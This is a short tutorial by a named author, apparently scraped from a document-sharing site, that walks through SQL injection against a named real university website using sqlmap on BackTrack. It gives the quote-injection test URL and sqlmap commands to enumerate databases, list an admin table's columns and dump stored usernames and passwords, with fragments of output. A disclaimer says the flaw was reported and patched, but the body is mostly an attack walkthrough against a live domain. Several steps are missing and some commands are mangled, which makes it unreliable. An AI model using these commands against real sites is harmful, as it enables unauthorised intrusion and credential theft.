Documente Academic
Documente Profesional
Documente Cultură
By : Anuj Khandelwal
Warning: Before the testing the owner of the website is informed and vulnerability has been patched now, we do not endorse hacking live websites and testing on live domains without any official documentation. Respect your countrys law system, this paper is just for education purpose only to understand the attack on websites and how to can countermeasure them. Any trail actions performed by readers after reading this paper will be their responsibility, Author do not help any responsibility of your trails and actions performed.
SQLMAP: SQLMAP is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of back-end database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying
file system and executing commands on the operating system via out-of-band connections.
Requirements for the Testing: 1. VMware Player 2. BackTrack 5 Linux Operating System 3. Wifi Connection 4. Vulnerable Site to Test
Step2 : Type = http://www.hu.edu.pk/viewfaculty.php?id=6' in url for checking, if the site is vulnerable. If You get an error such as : "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''6'' order by posasc' at line 1" on the Website That Means website is vulnerable.
Step3: Open your VMware Player using BackTrack as your Virtual Machine
The terminal screen would be opened on your screen , shown in the figure.
Step5 : enter
Write : cd /pentest/database/sqlmap
and press
Step 7 : Now for getting the database of website through python write the following command
python ./sqlmap.py -u www.hu.edu.pk/viewfaculty.php?id=12 dbs
As you can see we have found 3 databases available databases [3]: [*] c3results [*] information_schema [*] test Lets see what the first database will provide us
Step9: Write the command python ./sqlmap.py -u www.hu.edu.pk/viewfaculty.php?id=12 -T admin --columns By entering this, you would get something like
+---------+------------------+ | Column | Type |
Step10: Write the Final Code python ./sqlmap.py -u www.hu.edu.pk/viewfaculty.php?id=12 -T admin -U test -dump By pressing ENTER key , if there was any other website , then we would have got the Admin username and Password . But in this site the data is entered through FTP. Hence , we get to see the username and password .
About Author
Anuj Khandelwal, Web Security Researcher @ TechDefence Pvt. LTD Connect 2me: www.facebook.com/anujonthemove